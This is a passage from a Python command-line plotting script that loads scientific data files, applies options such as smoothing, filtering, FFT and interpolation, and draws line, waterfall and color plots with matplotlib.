''\r\n if args.line is not True:\r\n lineprops['lw'] = args.line # overrides mpl.rcParams['lines.linewidth'], but can be overridden by args.lw\r\nif args.marker:\r\n colorplot_marker_size = args.marker\r\n if args.marker is not True:\r\n lineprops['ms'] = args.marker\r\nelse:\r\n colorplot_marker_size = 20\r\nif args.lw:\r\n lineprops['lw'] = args.lw # overrides mpl.rcParams['lines.linewidth']\r\n\r\n# custom colormaps\r\nzidict = {'red': ((0.0, 0.3, 0.3),\r\n (0.25,0.2, 0.2),\r\n (0.5, 0.0, 0.0),\r\n (0.75,0.9, 0.9),\r\n (1.0, 1.0, 1.0)),\r\n 'green': ((0.0, 0.75, 0.75),\r\n (0.25,0.3, 0.3),\r\n (0.5, 0.0, 0.0),\r\n (0.75,0.13, 0.13),\r\n (1.0, 0.9, 0.9)),\r\n 'blue': ((0.0, 0.9, 0.9),\r\n (0.25,0.6, 0.6),\r\n (0.5, 0.0, 0.0),\r\n (0.75,0.13, 0.13),\r\n (1.0, 0.04, 0.04))}\r\nzibrov = LinearSegmentedColormap('zibrov', zidict) # similar to 'cool' (but ending in black) + 'hot' colormaps\r\nzibrov_r = zibrov.reversed()\r\nplt.register_cmap(cmap=zibrov)\r\nplt.register_cmap(cmap=zibrov_r)\r\n\r\n \r\n##### functions\r\ndef lorentzian(width, x0=0):\r\n # returns lorentzian with FWHM = width/2, over domain = width\r\n x = np.linspace(-width/2, width/2, width)\r\n hwhm = width/4\r\n f = 1/(1 + ((x-x0)/hwhm)**2)\r\n return f/np.sum(f)\r\n#####\r\n\r\ndef main(fig=None):\r\n # Flatten list of files\r\n files = []\r\n #for sublist in args.files:\r\n globbed_files = [file_or_glob(arg) for arg in args.files]\r\n for sublist in globbed_files:\r\n if type(sublist) is list:\r\n files.extend([fn for fn in sublist])\r\n else:\r\n files.append(sublist)\r\n\r\n # Determine number of columns in first file\r\n with open(files[0], 'r') as first_file:\r\n # Seek to first data row\r\n for line in range(args.header+1):\r\n first_line = first_file.readline()\r\n #totcols = len(first_line.split(args.delimiter))\r\n if args.delimiter:\r\n if args.delimiter == 'None':\r\n args.delimiter = None\r\n totcols = len([col.strip() for col in first_line.split(args.delimiter) if col.strip()])\r\n else:\r\n for delim in ['\\t', None, ',', ';']:\r\n totcols = len([col.strip() for col in first_line.split(delim) if col.strip()])\r\n if totcols > 1:\r\n args.delimiter = delim\r\n break\r\n if args.combinecols:\r\n args.usecols = [args.combinecols[0:1]]\r\n ncols = 1\r\n elif args.usecols:\r\n ncols = len(args.usecols[0])\r\n else:\r\n ncols = totcols - 1\r\n args.usecols = [list(range(totcols)),]\r\n for n, col in enumerate(args.plotvs[0]):\r\n args.usecols[0].pop(col-n)\r\n sq = np.sqrt(ncols)\r\n\r\n #if fig is None:\r\n # Create figure\r\n if args.superimpose:\r\n n, m = 1, 1\r\n elif args.vertical:\r\n n, m = ncols, 1\r\n elif args.horizontal:\r\n n, m = 1, ncols\r\n else:\r\n n, m = int(round(sq)), int(np.ceil(ncols/sq))\r\n fprops = dict(sharex=True)\r\n if args.sharey:\r\n fprops.update(dict(sharey=True))\r\n if args.size:\r\n fprops.update(dict(figsize=args.size, dpi=150))\r\n if args.dpi:\r\n fprops.update(dict(dpi=args.dpi))\r\n fig, axes = plt.subplots(n, m, **fprops)\r\n axes = np.atleast_1d(axes).ravel()\r\n if ncols < n*m:\r\n for ax in axes[ncols:n*m+1]:\r\n ax.set_visible(False)\r\n\r\n # Create event callbacks\r\n fig.canvas.mpl_connect('key_press_event', on_key_press)\r\n #else:\r\n #fig.clf()\r\n\r\n # Load the data\r\n data = []\r\n first_file = True\r\n if args.quiet:\r\n print('loading files...')\r\n for n, (fname, plotvs, usecols) in enumerate(zip(files, it.cycle(args.plotvs), it.cycle(args.usecols))):\r\n with open(fname, 'r') as f:\r\n if args.header:\r\n for line in range(args.header):\r\n header = 
f.readline()\r\n else:\r\n header = f.readline()\r\n f.seek(0)\r\n\r\n # Update number of columns in case files differ\r\n totcols = len([col.strip() for col in header.split(args.delimiter) if col.strip()])\r\n\r\n # Mode switching\r\n if len(plotvs) > 1 and not (args.waterfall or args.traces):\r\n lineplot_mode = False\r\n colorplot_mode = True\r\n else:\r\n lineplot_mode = True\r\n colorplot_mode = False\r\n if len(plotvs) == 1:\r\n if args.waterfall: # waterfall plot mode selected without second x-column\r\n print('waterfall plot requires two x-axes') # display error message\r\n if args.traces: # traces mode selected without second x-column\r\n print('linecuts require two x-axes (first is dimension from which to extract traces, second is plotting axis)') # display error message\r\n #if len(plotvs) == 1 and args.colorbyvalue:\r\n # print('color-by-value plot requires two x-axes (avg value of 2nd x-column one determines color)')\r\n\r\n # Deal with axes labels\r\n labels = np.asarray(['col {}'.format(col) + 20*'\\0' for col in range(totcols)], dtype=str)\r\n if args.header > 0 or args.listcols: # replace defaults with header labels if they exist\r\n # Header from last file in list used; only last line of header used\r\n #labels = np.asarray([element.strip().strip('#_0123456789') for element in header.split(args.delimiter)], dtype=str)\r\n #labels = np.asarray([element.strip().lstrip('#') for element in header.split(args.delimiter)], dtype=str)\r\n labels = [element.strip().lstrip('#') for element in header.split(args.delimiter)] # keep as list until AFTER label replacement\r\n if args.ifinlabels and args.ifinlabels not in labels:\r\n print(args.ifinlabels, 'not in header; skipping...')\r\n continue\r\n if args.listcols: # moved above label replacement to prevent overwrite before listing column headers\r\n print('list of columns:')\r\n for nl, label in enumerate(labels):\r\n print('{}:\\t{}'.format(nl, label))\r\n sys.exit(0)\r\n for l, label in enumerate(labels):\r\n tex = re.search('[{}_^]', label)\r\n if tex:\r\n twoparts = re.fullmatch('(.+)\\s(\\(.+\\))', label)\r\n if twoparts:\r\n labels[l] = '${}$ {}'.format(twoparts.group(1), twoparts.group(2))\r\n else:\r\n labels[l] = '${}$'.format(label)\r\n if args.ylabels: # replace header labels with custom labels if provided\r\n if lineplot_mode:\r\n #labels[usecols] = args.ylabels\r\n for col, ylabel in zip(usecols, args.ylabels):\r\n labels[col] = ylabel\r\n elif colorplot_mode:\r\n labels[plotvs[1]] = args.ylabels[0]\r\n if args.xlabel:\r\n labels[plotvs[0]] = args.xlabel\r\n if colorplot_mode and args.clabels:\r\n #labels[usecols] = args.clabels\r\n for col, clabel in zip(usecols, args.clabels):\r\n labels[col] = clabel\r\n # convert to numpy array of strings AFTER replacing labels (prevents truncation of long custom labels)\r\n labels = np.asarray(labels)\r\n\r\n # Load the data\r\n try:\r\n if args.timedelta is not False:\r\n args.datetime = args.timedelta # handle both in the same way until plotting\r\n if args.datetime is not False:\r\n date_fmt = '%Y-%m-%dT%H:%M:%S.%f'\r\n str2date = lambda s: datetime.datetime.strptime(s.decode('utf-8').strip(), date_fmt).timestamp() # key missing ingredient was whitespace at the end of string\r\n #str2date = lambda s: float(np.datetime64(s))\r\n #print(str2date('2018-03-22T11:57:03.456'))\r\n if len(args.datetime) > 1: # date and time in separate columns\r\n # read and combine datetime columns\r\n date_fmt = '%d-%m-%y %H:%M:%S' # BlueFors format; note that this is not the same as our special 
measure format\r\n date_columns = np.loadtxt(fname, usecols=args.datetime, delimiter=args.delimiter, dtype=str)\r\n datetimes = np.array([datetime.datetime.strptime(' '.join((d, t)).strip(), date_fmt).timestamp() for d, t in date_columns])\r\n\r\n # read data columns and fill plotvs[0] with datetimes\r\n data_columns = np.genfromtxt(fname, delimiter=args.delimiter, skip_header=args.header)\r\n data_columns[:, plotvs[0]] = datetimes[:data_columns.shape[0]] # places datetimes in first plotvs columns (default 0); may want to use first datetime column in future; try modifying plotvs[0] itself to store column of args.datetime[0]; this will preserve labeling and such\r\n else:\r\n data_columns = np.loadtxt(fname, delimiter=args.delimiter, converters={args.datetime[0]: str2date})\r\n #data_columns = np.genfromtxt(fname, delimiter=args.delimiter, skip_header=args.header, converters={args.datetime: str2date})\r\n #print(data_columns[0, :])\r\n else:\r\n data_columns = np.loadtxt(f, delimiter=args.delimiter)\r\n except ValueError:\r\n # prepare for chaining\r\n #if n > 0:\r\n # nlast += data_columns.shape[0]\r\n #else:\r\n # nlast = 0\r\n if first_file: # added in haste on 11-15-2018 to allow file filtering based on presence of specific column header\r\n nlast = 0\r\n first_file = False\r\n else:\r\n nlast += data_columns.shape[0]\r\n # method 1: replace first column with row number\r\n #data_columns = np.loadtxt(f, usecols=range(1, totcols), delimiter=args.delimiter)\r\n #data_columns = np.column_stack((np.arange(data_columns.shape[0])+nlast*args.chain, data_columns))\r\n\r\n # method 2: looping try block to skip columns from the left until a valid dataset is loaded (a hack to skip two-column date formats)\r\n #skipcols = 1\r\n #while True:\r\n #try:\r\n #data_columns = np.loadtxt(f, usecols=range(skipcols, totcols), delimiter=args.delimiter)\r\n #data_columns = np.column_stack(skipcols*[np.arange(data_columns.shape[0])+nlast*args.chain] + [data_columns])\r\n #break\r\n #except ValueError:\r\n #skipcols += 1\r\n #continue\r\n\r\n # method 3: skips string values but can do much more with customization; only fill first column with row number\r\n data_columns = np.genfromtxt(fname, delimiter=args.delimiter, skip_header=args.header)\r\n data_columns[:, 0] = np.arange(data_columns.shape[0])+nlast*args.chain\r\n if not (args.xlabel and plotvs[0]==0):\r\n labels[0] = 'points'\r\n\r\n # method 4: currently doesn't work due to matplotlib problem dealing with iterables\r\n #from matplotlib.dates import datestr2num\r\n #data_columns = np.genfromtxt(fname, delimiter=args.delimiter, converters={0: datestr2num})\r\n rows = data_columns.shape[0]\r\n stdoutstr = '{}\\t{} rows\\t{} columns'\r\n if rows == 0:\r\n stdoutstr += '\\tskipping empty file'\r\n if not args.quiet:\r\n print(stdoutstr.format(fname, rows, totcols))\r\n data.append(None) # need empty element for correct file counting\r\n continue\r\n\r\n if args.masknegative:\r\n data_columns[:, usecols] = np.where(data_columns[:,usecols]<0, np.nan, data_columns[:,usecols])\r\n if args.deleterows:\r\n if not args.quiet:\r\n print('deleting specified rows.. ', end='')\r\n for row in args.deleterows:\r\n data_columns[row, usecols] = np.nan\r\n if not args.quiet:\r\n print('{} rows deleted'.format(len(args.deleterows)))\r\n if args.trimspikes:\r\n for trimcol in args.trimspikes:\r\n if not args.quiet:\r\n print('trimming spikes in column {}.. 
'.format(trimcol), end='')\r\n def nan_get(y): # returns boolean array and function yielding indices of NaNs\r\n return np.isnan(y), lambda z: z.nonzero()[0]\r\n col = data_columns[:, trimcol]\r\n nans, idx = nan_get(col) # find the NaNs\r\n col[nans] = np.interp(idx(nans), idx(~nans), col[~nans]) # replace NaNs with interpolated values\r\n avg = np.convolve(col, np.array([1,1,0,1,1])/4, 'same')\r\n # remove data which differs from the rolling average\r\n spikes = np.fabs((col-avg)/avg) > 0.02 # by 2%\r\n #plt.plot(col)\r\n #plt.plot(avg, '.')\r\n #plt.plot((col-avg)/avg, '-.')\r\n data_columns[spikes, trimcol] = np.nan\r\n if not args.quiet:\r\n print('{} elements removed'.format(np.sum(spikes)))\r\n if args.monotonic:\r\n if not args.quiet:\r\n print('clipping data with non-monotonic sweep direction.. ', end='')\r\n xdata = data_columns[:, plotvs[0]]\r\n direction = np.sign(np.mean(np.diff(xdata)))\r\n if direction > 0:\r\n cut_rows = xdata != np.maximum.accumulate(xdata)\r\n else:\r\n cut_rows = xdata != np.minimum.accumulate(xdata)\r\n for col in usecols:\r\n data_columns[cut_rows, col] = np.nan\r\n if not args.quiet:\r\n print('{} elements deleted'.format(np.sum(cut_rows))) # count only the masked rows, not the full array size\r\n if args.combinecols:\r\n data_columns[:, usecols] = np.sqrt(np.sum(data_columns[:, args.combinecols]**2, axis=1, keepdims=True))\r\n if not args.ylabels:\r\n newlabels = list(labels) # convert to list for mutability\r\n newlabels[args.combinecols[0]] = '$\\sqrt{{[{}]^2+[{}]^2}}$'.format(*labels[args.combinecols]) # overwrite new label\r\n labels = np.asarray(newlabels, dtype=str) # convert back to array (cannot otherwise change size of array or string length)\r\n if args.yshift:\r\n data_columns[:, usecols] += args.yshift\r\n if args.boxcar:\r\n for col in usecols:\r\n data_columns[:, col] = np.convolve(data_columns[:, col], np.ones((args.boxcar,))/args.boxcar, 'same')\r\n data_columns[:args.boxcar, col] = np.nan # mask elements outside valid boxcar range\r\n data_columns[-args.boxcar:, col] = np.nan # mask elements outside valid boxcar range\r\n if args.xboxcar:\r\n data_columns[:, plotvs[0]] = np.convolve(data_columns[:, plotvs[0]], np.ones((args.xboxcar,))/args.xboxcar, 'same')\r\n data_columns[:args.xboxcar, plotvs[0]] = np.nan # mask elements outside valid boxcar range\r\n data_columns[-args.xboxcar:, plotvs[0]] = np.nan # mask elements outside valid boxcar range\r\n if args.x2boxcar:\r\n data_columns[:, plotvs[1]] = np.convolve(data_columns[:, plotvs[1]], np.ones((args.x2boxcar,))/args.x2boxcar, 'same')\r\n data_columns[:args.x2boxcar, plotvs[1]] = np.nan # mask elements outside valid boxcar range\r\n data_columns[-args.x2boxcar:, plotvs[1]] = np.nan # mask elements outside valid boxcar range\r\n if args.lorentz: # lorentzian blur of data\r\n for col in usecols:\r\n data_columns[:, col] = np.convolve(data_columns[:, col], lorentzian(args.lorentz), 'same')\r\n data_columns[:args.lorentz, col] = np.nan # mask elements outside valid lorentz range\r\n data_columns[-args.lorentz:, col] = np.nan # mask elements outside valid lorentz range\r\n if args.interpolate and (lineplot_mode or len(args.interpolate) == 1): # colorplot interpolation must occur after all file data has been collected\r\n interpX = args.interpolate[0] # only use X1, X2, Nx group (ignore beyond semicolon in argument)\r\n if len(interpX) < 3: # use data limits for interpolation limits\r\n X1, X2, Nx = np.nanmin(data_columns[:, plotvs[0]]), np.nanmax(data_columns[:, plotvs[0]]), int(interpX[0])\r\n else: # use user-provided limits\r\n X1, X2, Nx = interpX\r\n Nx = 
int(Nx)\r\n data_fn = sci.interp1d(data_columns[:, plotvs[0]], data_columns[:, usecols], axis=0)\r\n #axis=0, fill_value='extrapolate')\r\n raw_data_columns = data_columns\r\n data_columns = np.empty((Nx, totcols))\r\n data_columns[:, plotvs[0]] = np.linspace(X1, X2, Nx)\r\n data_columns[:, usecols] = data_fn(data_columns[:, plotvs[0]])\r\n stdoutstr += '\\tinterpolated and resampled to {} rows'.format(Nx)\r\n for col in args.symmetrize:\r\n data_columns[:, col] = 0.5*(data_columns[:, col] + data_columns[::-1, col])\r\n axes[usecols.index(col)].set_title('symmetrized')\r\n for col in args.antisymmetrize:\r\n data_columns[:, col] = 0.5*(data_columns[:, col] - data_columns[::-1, col])\r\n axes[usecols.index(col)].set_title('antisymmetrized')\r\n if args.divcol:\r\n data_columns[:, usecols] *= 1/data_columns[:, args.divcol][:, None]\r\n if args.xdivcol:\r\n data_columns[:, plotvs[0]] *= 1/data_columns[:, args.xdivcol]\r\n if args.derivative:\r\n if type(args.derivative) is list:\r\n derivcols = args.derivative\r\n elif args.derivative is True:\r\n derivcols = usecols.copy()\r\n data_columns[:, derivcols] = np.gradient(data_columns[:, derivcols], np.squeeze(data_columns[:, plotvs[0]]), axis=0)\r\n if not args.ylabels:\r\n for derivcol in [derivcol for derivcol in derivcols if derivcol in usecols]:\r\n labels[derivcol] = 'derivative of {}'.format(labels[derivcol])\r\n# if args.meansubtract:\r\n# data_columns[:, usecols] -= np.nanmean(data_columns[:, usecols], axis=0)\r\n if args.integrate:\r\n if type(args.integrate) is list:\r\n intcols = args.integrate\r\n elif args.integrate is True:\r\n intcols = usecols.copy()\r\n data_columns[:, intcols] = scg.cumtrapz(data_columns[:, intcols], data_columns[:, plotvs[0]], axis=0, initial=0)\r\n if not args.ylabels:\r\n for intcol in [intcol for intcol in intcols if intcol in usecols]:\r\n labels[intcol] = 'integral of {}'.format(labels[intcol])\r\n if args.fft:\r\n if type(args.fft) is list:\r\n fftcols = args.fft\r\n elif args.fft is True:\r\n fftcols = usecols.copy()\r\n FFT = np.fft.rfft(data_columns[:, fftcols], axis=0)\r\n data_columns[:, fftcols] = np.nan\r\n data_columns[:FFT.shape[0], fftcols] = FFT.real\r\n FREQ = np.fft.rfftfreq(data_columns.shape[0], d=np.fabs(np.mean(np.diff(data_columns[:, plotvs[0]]))))\r\n data_columns[:, plotvs[0]] = np.nan\r\n data_columns[:FFT.shape[0], plotvs[0]] = FREQ\r\n if not args.ylabels:\r\n for fftcol in [fftcol for fftcol in fftcols if fftcol in usecols]:\r\n labels[fftcol] = 'FFT[{}]'.format(labels[fftcol])\r\n if not args.xlabel:\r\n labels[plotvs[0]] = '1 / {}'.format(labels[plotvs[0]])\r\n if args.lpfilter:\r\n order = 10\r\n filt = scs.butter(order, args.lpfilter, btype='lowpass', output='sos', fs=1/np.fabs(np.mean(np.diff(data_columns[:, plotvs[0]]))))\r\n for u in usecols:\r\n data_columns[:, u] = scs.sosfilt(filt, data_columns[:, u])\r\n if args.hpfilter:\r\n order = 10\r\n filt = scs.butter(order, args.hpfilter, btype='highpass', output='sos', fs=1/np.fabs(np.mean(np.diff(data_columns[:, plotvs[0]]))))\r\n for u in usecols:\r\n data_columns[:, u] = scs.sosfilt(filt, data_columns[:, u])\r\n if args.bpfilter:\r\n order = 10\r\n filt = scs.butter(order, args.bpfilter, btype='bandpass', output='sos', fs=1/np.fabs(np.mean(np.diff(data_columns[:, plotvs[0]]))))\r\n for u in usecols:\r\n data_columns[:, u] = scs.sosfilt(filt, data_columns[:, u])\r\n if args.invert is not False or args.xinvert:\r\n if type(args.invert) is list:\r\n invcols = args.invert\r\n elif args.invert is True:\r\n invcols = 
usecols.copy()\r\n else:\r\n invcols = []\r\n if args.xinvert:\r\n invcols.extend(plotvs)\r\n invcols = list(set(invcols))\r\n if not args.xlabel:\r\n for invcol in [invcol for invcol in invcols if invcol in plotvs]:\r\n labels[invcol] = '1 / {}'.format(labels[invcol])\r\n data_columns[:, invcols] = 1/data_columns[:, invcols]\r\n if not args.ylabels:\r\n for invcol in [invcol for invcol in invcols if invcol in usecols]:\r\n labels[invcol] = '1 / {}'.format(labels[invcol])\r\n data.append(data_columns)\r\n if not args.quiet:\r\n print(stdoutstr.format(fname, rows, totcols))\r\n\r\n for p, (ax, col, label) in enumerate(zip(it.cycle(axes),\r\n #data[n][:, args.usecols[:data[n].shape[1]-3]].T,\r\n data[n][:, usecols].T,\r\n labels[usecols])):\r\n formatter = EngFormatter(sep=u'\\N{THIN SPACE}') # format axes using engineering notation\r\n ax.xaxis.set_major_formatter(formatter)\r\n ax.yaxis.set_major_formatter(formatter)\r\n\r\n xdata = data[n][:, plotvs[0]].copy()\r\n if colorplot_mode or args.waterfall:\r\n ydata = data[n][:, plotvs[1]] #.copy()\r\n xdata = data[n][:, plotvs[0]] # don't use a copy; this allows xdata manipulations through to colorplot\r\n col = data[n][:, usecols[p]] # don't copy; allows direct manipulation to propagate to colorplot\r\n if args.traces:\r\n tr_data = data[n][:, plotvs[0]]\r\n xdata = data[n][:, plotvs[1]] # don't use a copy; this allows xdata manipulations through to colorplot\r\n if args.xmult:\r\n if len(args.xmult) > 1 and len(args.xmult[0]) > 1:\r\n xmult = args.xmult[n][p]\r\n elif len(args.xmult) > 1:\r\n xmult = args.xmult[n][0]\r\n elif len(args.xmult[0]) > 1:\r\n xmult = args.xmult[0][p]\r\n elif p == 0: # if only one multiplier provided, only multiply the x-axis data one time (otherwise it applies xmult^p)\r\n xmult = args.xmult[0][0]\r\n else:\r\n xmult = 1\r\n xdata *= xmult\r\n if args.x2mult and (colorplot_mode or args.waterfall):\r\n if len(args.x2mult) > 1 and len(args.x2mult[0]) > 1:\r\n x2mult = args.x2mult[n][p]\r\n elif len(args.x2mult) > 1:\r\n x2mult = args.x2mult[n][0]\r\n elif len(args.x2mult[0]) > 1:\r\n x2mult = args.x2mult[0][p]\r\n elif p == 0: # if only one multiplier provided, only multiply the x2-axis data one time (otherwise it applies x2mult^p)\r\n x2mult = args.x2mult[0][0]\r\n else:\r\n x2mult = 1\r\n ydata *= x2mult\r\n if args.xshifts:\r\n if len(args.xshifts) > 1 and len(args.xshifts[0]) > 1:\r\n xshifts = args.xshifts[n][p]\r\n elif len(args.xshifts) > 1:\r\n if len(args.xshifts) < len(files): # cycle instead\r\n if n == 0:\r\n iterxshifts = it.cycle(args.xshifts)\r\n xshifts = next(iterxshifts) # doesn't work if there is more than one panel\r\n else:\r\n xshifts = args.xshifts[n][0]\r\n elif len(args.xshifts[0]) > 1:\r\n xshifts = args.xshifts[0][p]\r\n else:\r\n xshifts = args.xshifts[0][0]\r\n xdata += xshifts\r\n if args.fold:\r\n xdata = np.fabs(xdata)\r\n if args.xnorm:\r\n xmin, xmax = np.nanmin(xdata), np.nanmax(xdata)\r\n xdata -= xmin\r\n xdata *= 1/(xmax-xmin)\r\n if not args.ylabels and args.divcol:\r\n label += ' / {}'.format(labels[args.divcol])\r\n if args.normy:\r\n ymin, ymax = np.nanmin(col), np.nanmax(col)\r\n col -= ymin\r\n col *= 1/(ymax-ymin)\r\n if not args.ylabels:\r\n label = 'normalized ' + label\r\n if args.ymult:\r\n if len(args.ymult) > 1 and len(args.ymult[0]) > 1:\r\n ymult = args.ymult[n][p]\r\n elif len(args.ymult) > 1:\r\n ymult = args.ymult[n][0]\r\n elif len(args.ymult[0]) > 1:\r\n ymult = args.ymult[0][p]\r\n else:\r\n ymult = args.ymult[0][0]\r\n col *= ymult\r\n if not 
args.ylabels:\r\n label += r'$\\times {:.3g}$'.format(ymult)\r\n if args.zeroy:\r\n col -= np.nanmin(col)\r\n if not args.ylabels:\r\n label += ' - ymin'\r\n if args.orezy:\r\n col -= np.nanmax(col)\r\n if not args.ylabels:\r\n label += ' - ymax'\r\n if args.meansubtract:\r\n col -= np.nanmean(col)\r\n if not args.ylabels:\r\n label += ' - ymean'\r\n if args.polynomialsubtract:\r\n polynomial = np.polyfit(xdata, col, args.polynomialsubtract)\r\n col -= np.polyval(polynomial, xdata)\r\n if not args.ylabels:\r\n label += ' - {:g}d polynomial fit'.format(args.polynomialsubtract)\r\n if args.yshifts:\r\n if len(args.yshifts)>1:\r\n col += args.yshifts[n]\r\n else: # Waterfall plot ordered by file sequence\r\n if colorplot_mode:\r\n data[n][:, plotvs[1]] += n*args.yshifts[0]\r\n else:\r\n col += n*args.yshifts[0]\r\n if args.hysteresis:\r\n if n % 2: # odd, and therefore second file of each pair\r\n if colorplot_mode:\r\n data[n][:, usecols] = data[n][:, usecols] - np.flip(data[n-1][:, usecols])\r\n data[n-1][:, usecols] = np.nan\r\n else:\r\n col = col - lastcol\r\n else:\r\n lastcol = np.flip(col)\r\n continue\r\n if args.waterfall: # Waterfall plot mode\r\n col += args.waterfall*ydata # separate lines by second x-value times multiplier (default 1)\r\n if args.traces: # trace plot mode\r\n cidx = np.asarray([np.nanargmin(np.fabs(tr_value-tr_data)) for tr_value in args.traces])\r\n traces = col[cidx]\r\n col = np.full_like(col, np.nan)\r\n col[cidx] = traces\r\n if colorplot_mode: # Colorplot mode\r\n xlabel = labels[plotvs[0]]\r\n ylabel = labels[plotvs[1]]\r\n clabel = label\r\n if args.cornplot: # Special colorplot for data versus rotating field\r\n xdata, ydata = ydata*np.sin(xdata*np.pi/180), ydata*np.cos(xdata*np.pi/180)\r\n ylabel = 'parallel magnetic field (T)'\r\n xlabel = 'perpendicular magnetic field (T)' \r\n if (n == 0 or (args.hysteresis and n==1)) and p == 0:\r\n crange = len(axes)*[()]\r\n gcmin, gcmax = np.full(len(axes), np.nan), np.full(len(axes), np.nan)\r\n if not args.crange:\r\n col = np.ma.masked_invalid(col)\r\n if args.logz:\r\n col = np.ma.masked_less_equal(col, 0)\r\n cmin, cmax = np.nanmin(col), np.nanmax(col)\r\n gcmin[p], gcmax[p] = np.nanmin([cmin, gcmin[p]]), np.nanmax([cmax, gcmax[p]]) # set global min/max for this panel\r\n crange[p] = gcmin[p], gcmax[p] # use global upper and lower limits considering all files\r\n if not args.quiet:\r\n print('{} data ranges from approx {:.6g} to {:.6g}; global limits {:.6g} to {:.6g}'.format(clabel, cmin, cmax, *crange[p]))\r\n elif n == 0:\r\n if len(args.crange) > 1:\r\n crange[p] = args.crange[p]\r\n else:\r\n crange[p] = args.crange[0]\r\n # Ends up labeling based on last file in list\r\n ax.set_ylabel(ylabel)\r\n ax.set_xlabel(xlabel)\r\n \r\n #if not args.interpolate or len(args.interpolate) == 1: # colorplot based on raw data (scattered points); interpolation handled after collecting all files\r\n #cplot_props = dict(s=colorplot_marker_size, edgecolors='none')\r\n #if args.square:\r\n #cplot_props['marker'] = 's'\r\n #cplot = ax.scatter(xdata, ydata, c=col, cmap=args.cmap, vmin=crange[p][0], vmax=crange[p][1], **cplot_props)\r\n ##ax.autoscale(enable=True, axis='both', tight=True)\r\n #if n == 0: # add colorbar first time around\r\n #cbar = fig.colorbar(cplot, ax=ax)\r\n #cbar.set_label(clabel)\r\n #cbar.set_clim(*crange[p]) # update colorbar limits (only scales colormap)\r\n #cbar.draw_all() # will not redraw ticks/limits without this\r\n if lineplot_mode:\r\n if args.colorbyorder:\r\n if type(args.colorbyorder) is 
str:\r\n cm = mcm.get_cmap(args.colorbyorder)\r\n else:\r\n cm = mcm.get_cmap(args.cmap)\r\n lineprops['c'] = cm(n/max(len(files)-1, 1)) # avoid division by zero when only one file is given\r\n elif args.color:\r\n lineprops['c'] = next(args.color)\r\n elif args.ls:\r\n lineprops['ls'] = next(args.ls)\r\n if args.datetime is not False: # date_plot mode\r\n datetimes = [datetime.datetime.fromtimestamp(ts) for ts in xdata]\r\n ax.xaxis.set_major_formatter(mpl.dates.DateFormatter('%b %d, %H:%M')) # month, day hours:minutes\r\n if args.timedelta is not False:\r\n d0 = datetimes[0]\r\n dt0 = datetime.timedelta(days=d0.day, hours=d0.hour, minutes=d0.minute, seconds=d0.second, microseconds=d0.microsecond)\r\n datetimes = [dt - dt0 for dt in datetimes]\r\n ax.xaxis.set_major_formatter(mpl.dates.DateFormatter('%H:%M:%S')) # ignore dates and just plot versus elapsed time\r\n if p == 0: # don't need to print for each column\r\n if not args.quiet:\r\n print('time elapsed: {}'.format(datetimes[-1])) # can improve this later\r\n datetimes = mpl.dates.date2num(datetimes)\r\n line = ax.plot_date(datetimes, col, label=fname, **lineprops)\r\n for l in ax.get_xticklabels():\r\n l.set_rotation(45)\r\n else:\r\n line = ax.plot(xdata, col, label=fname, **lineprops)\r\n \r\n # Ends up labeling based on last file in list\r\n ax.set_ylabel(label)\r\n if args.traces:\r\n ax.set_xlabel(labels[plotvs[1]])\r\n else:\r\n ax.set_xlabel(labels[plotvs[0]])\r\n if args.logx:\r\n ax.set_xscale('log', nonposx='clip')\r\n if args.logy:\r\n ax.set_yscale('log', nonposy='clip')\r\n if args.arrows:\r\n ind = col.shape[0]//2\r\n ax.annotate('', xy=(xdata[ind+args.arrows], col[ind+args.arrows]),\r\n xytext=(xdata[ind], col[ind]),\r\n arrowprops=dict(arrowstyle='->', ec=line[-1].get_color(), linewidth=4), size=24)\r\n if args.dashes and np.mean(np.diff(xdata)) < 0:\r\n line[-1].set_ls('--')\r\n ax.autoscale(enable=True, axis='x', tight=True)\r\n if args.xlim:\r\n ax.set_xlim(args.xlim)\r\n if args.ylims:\r\n if len(args.ylims) > 1:\r\n ylim = args.ylims[p]\r\n else:\r\n ylim = args.ylims[0]\r\n ax.set_ylim(ylim)\r\n\r\n if colorplot_mode:\r\n # use data from all files for 2D interpolation\r\n raw_data = np.concatenate([d for d in data if d is not None]) # skip empty entries (from empty files)\r\n raw_data = np.ma.masked_invalid(raw_data)\r\n\r\n if args.interpolate and len(args.interpolate) > 1:\r\n # set interpolation limits\r\n interpX, interpY = args.interpolate # ((X1, X2, Nx), (Y1, Y2, Ny))\r\n if len(interpX) < 3: # use data limits for interpolation limits\r\n X1, X2, Nx = np.nanmin(raw_data[:, plotvs[0]]), np.nanmax(raw_data[:, plotvs[0]]), int(interpX[0])\r\n else: # use user-provided limits\r\n X1, X2, Nx = interpX\r\n Nx = int(Nx)\r\n if len(interpY) < 3: # use data limits for interpolation limits\r\n Y1, Y2, Ny = np.nanmin(raw_data[:, plotvs[1]]), np.nanmax(raw_data[:, plotvs[1]]), int(interpY[0])\r\n else: # use user-provided limits\r\n Y1, Y2, Ny = interpY\r\n Ny = int(Ny)\r\n gridY, gridX = np.mgrid[Y1:Y2:Ny*1j, X1:X2:Nx*1j]\r\n\r\n # apply mask color, if supplied (only works for colormaps, not scatter)\r\n if args.masknegative and args.masknegative is not True:\r\n args.cmap = mcm.get_cmap(args.cmap)\r\n args.cmap.set_bad(color=args.masknegative)\r\n\r\n # interpolate and plot\r\n cplot_props = dict(cmap=args.cmap, origin='lower', aspect='auto', interpolation='none')\r\n for p, (ax, usecol, clabel) in enumerate(zip(it.cycle(axes), usecols, labels[usecols])):\r\n interp_data = sci.griddata(raw_data[:, plotvs], raw_data[:, usecol], (gridX, gridY))\r\n if args.logz:\r\n 
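# note: LogNorm renders the color scale logarithmically; matplotlib treats values <= 0 as invalid (masked) under this norm, so they inherit the cmap's 'bad' color set above\r\n 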
